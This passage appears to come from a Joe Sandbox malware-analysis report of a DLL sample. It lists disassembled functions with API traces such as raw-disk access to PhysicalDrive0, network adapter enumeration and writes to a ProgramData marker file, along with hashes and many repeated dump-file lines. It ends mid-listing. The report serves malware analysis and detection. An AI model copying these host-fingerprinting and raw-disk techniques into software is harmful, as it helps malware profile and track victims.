Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Library$AdaptersAddressFreeInfoLoadProc
String ID: GetAdaptersInfo$iphlpapi.dll
API String ID: 514930453-3114217049
Opcode ID: c76babb7bc64f53f9a3deb8ace7e54a41d89bba2ed4c9622dd5f386f76540279
Instruction ID: 8c5940d6773624d00b92e4cbaf3fc63739c863f0ff9afd805ba81f513d453824
Opcode Fuzzy Hash: c76babb7bc64f53f9a3deb8ace7e54a41d89bba2ed4c9622dd5f386f76540279
Instruction Fuzzy Hash: 7E21DB32B042099FDB11DBA9CA446EEBBF8EF09318F34056BD564E7B01D7309A45C7A2

Function 6CEC8003 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000,?), ref: 6CEC8022
DeviceIoControl.KERNELBASE(00000000,002D1400,98BADCFE,0000000C,?,00000400,?,00000000), ref: 6CEC8060
GetLastError.KERNEL32 ref: 6CEC80C1
CloseHandle.KERNELBASE(?), ref: 6CEC80F8

Strings

\\.\PhysicalDrive0, xrefs: 6CEC801B

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CloseControlCreateDeviceErrorFileHandleLast
String ID: \\.\PhysicalDrive0
API String ID: 4026078076-1180397377
Opcode ID: cab2535cf603314049a3d0a595184cbd755285a3e8136dca01a87d00a36312a5
Instruction ID: d9ad6e5b6acf93b654008e1f38fb30647e243817c9437267d415ea5a92bae1e4
Opcode Fuzzy Hash: cab2535cf603314049a3d0a595184cbd755285a3e8136dca01a87d00a36312a5
Instruction Fuzzy Hash: 2D31A671F00215ABEB24CF95CA55AEF7B78EF05758F30416EE524A3A80D7705A05CB91

Function 6CEB3EDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedIncrement.KERNEL32(-00000015), ref: 6CEB3EEC

Part of subcall function 6CEB27DD: __EH_prolog.LIBCMT ref: 6CEB27E2
Part of subcall function 6CEB27DD: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 6CEB27F8
Part of subcall function 6CEB27DD: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?,?,?,?,?,6CEB3F7F,?,?,?,?,?,Xll,00000000), ref: 6CEB280B
Part of subcall function 6CEB27DD: InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB2834

Strings

Xll, xrefs: 6CEB3F1B

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: Interlocked$Exchange$CompareCompletionH_prologIncrementPostQueuedStatus
String ID: Xll
API String ID: 2993877247-1487709360
Opcode ID: 018877f99b6ff207e2bd73ee039ce0be430eba1488e3a4a3f69db7cbfcc375f0
Instruction ID: 141ab654500f71295b48e5b0b34873a10d129229b357f922dbf9093ecdbcdfb1
Opcode Fuzzy Hash: 018877f99b6ff207e2bd73ee039ce0be430eba1488e3a4a3f69db7cbfcc375f0
Instruction Fuzzy Hash: 5E11E275204208ABDF108E18CD87FEA3B75EF05358F30411AFA15E7A90CB34D865CB90

Function 6CEB207B Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 104
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 6CEB2090
GetLastError.KERNEL32 ref: 6CEB20A2

Part of subcall function 6CEB1A0E: __EH_prolog.LIBCMT ref: 6CEB1A13

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 6CEB20D4
GetLastError.KERNEL32 ref: 6CEB20E6
__beginthreadex.LIBCMT ref: 6CEB2126
GetLastError.KERNEL32 ref: 6CEB213B
CloseHandle.KERNEL32(00000000), ref: 6CEB2151
CloseHandle.KERNEL32(00000000), ref: 6CEB215F
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 6CEB2183
CloseHandle.KERNELBASE(00000000), ref: 6CEB218A

Strings

thread.entry_event, xrefs: 6CEB20BA
thread, xrefs: 6CEB216C
thread.exit_event, xrefs: 6CEB20FE

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
String ID: thread$thread.entry_event$thread.exit_event
API String ID: 831262434-3017686385
Opcode ID: 129785652a41dbfb1b9b4af8961801ec61de7cd2a0f60f9920b189578c500f07
Instruction ID: fb9f94d31926fe6a302acee89b5b4f5d6c96f7fa5eff18032ff7a3213cf1f86a
Opcode Fuzzy Hash: 129785652a41dbfb1b9b4af8961801ec61de7cd2a0f60f9920b189578c500f07
Instruction Fuzzy Hash: 89319171A00218EFDB00DFA0C848BAEBB75FF49355F208569E915AB750DB709D04DB90

Function 6CEB66B9 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 96
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 6CEB66C4

Part of subcall function 6CECB71C: __FF_MSGBANNER.LIBCMT ref: 6CECB733
Part of subcall function 6CECB71C: __NMSG_WRITE.LIBCMT ref: 6CECB73A
Part of subcall function 6CECB71C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,00000000,00000000,?,6CED121A,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8), ref: 6CECB75F

SHGetSpecialFolderPathW.SHELL32(00000000,6CEB6BCB,00000023,00000000,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB66F1
lstrcpyW.KERNEL32(C:\ProgramData\rc.dat,6CEB6BCB,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB66FF
lstrcatW.KERNEL32(C:\ProgramData\rc.dat,\ts.dat,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB670F
CreateFileW.KERNELBASE(C:\ProgramData\rc.dat,80000000,00000000,00000000,00000003,00000020,00000000,?,?,?,?,?,?,6CEB6BCB,?), ref: 6CEB6729
ReadFile.KERNELBASE(000000FF,?,00000008,?,00000000,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB6747
CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB6750

Part of subcall function 6CEB60CA: _malloc.LIBCMT ref: 6CEB60DE

CreateFileW.KERNEL32(C:\ProgramData\rc.dat,40000000,00000000,00000000,00000002,00000022,00000000,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB6793
WriteFile.KERNEL32(000000FF,?,00000008,?,00000000,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB67B1
CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,6CEB6BCB), ref: 6CEB67BA

Strings

C:\ProgramData\rc.dat, xrefs: 6CEB66DB, 6CEB66FA, 6CEB670A, 6CEB6724, 6CEB678E
\ts.dat, xrefs: 6CEB6705

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandle_malloc$AllocateFolderHeapPathReadSpecialWritelstrcatlstrcpy
String ID: C:\ProgramData\rc.dat$\ts.dat
API String ID: 1057352565-2903805982
Opcode ID: 4adc0f3cfcb2830a0d6451e26e18dcc1088164090e6f8ae233bb9b74a53caac4
Instruction ID: af5dd343d015a0c7422a22f1556dee246082e92f920b1c5d322c44fe6179ff4a
Opcode Fuzzy Hash: 4adc0f3cfcb2830a0d6451e26e18dcc1088164090e6f8ae233bb9b74a53caac4
Instruction Fuzzy Hash: B9317E72680208BFEB54EBE08D4AFAD7B78EB09704F204569F611FA1D0DB715A059B51

Function 6CEB57B7 Relevance: 15.2, APIs: 10, Instructions: 239
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 6CEB57BC
EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB57E8
EnterCriticalSection.KERNEL32(6CEF13B8,6CEE5EEF), ref: 6CEB58A8
LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB58AE
EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB58B5
LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB58BB
EnterCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB5A90
LeaveCriticalSection.KERNEL32(6CEF13B8), ref: 6CEB5A99

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$Leave$H_prolog
String ID:
API String ID: 3611688910-0
Opcode ID: 7366b7195f324ab2daa9e57fe15bd3deeb93be7a5b4eb90135a5a7bfc46fc371
Instruction ID: 4fa28eeb552a8aacd68c47d74ec23e43bb14200c390594fab8cb8d625228390f
Opcode Fuzzy Hash: 7366b7195f324ab2daa9e57fe15bd3deeb93be7a5b4eb90135a5a7bfc46fc371
Instruction Fuzzy Hash: 5491A0B5C0121DAACF11DBE0CE85BFEB778AF15308F20015AE515B3640EB785A4ECBA1

Function 6CEB66CB Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 57
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

